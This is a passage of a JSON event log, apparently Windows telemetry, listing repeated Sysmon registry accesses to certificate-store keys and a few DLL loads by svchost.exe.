"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "execmodelproxy.dll", - "image_path": "C:\\Windows\\System32\\execmodelproxy.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901840000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ResourcePolicyClient.dll", - "image_path": "C:\\Windows\\System32\\ResourcePolicyClient.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901840000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 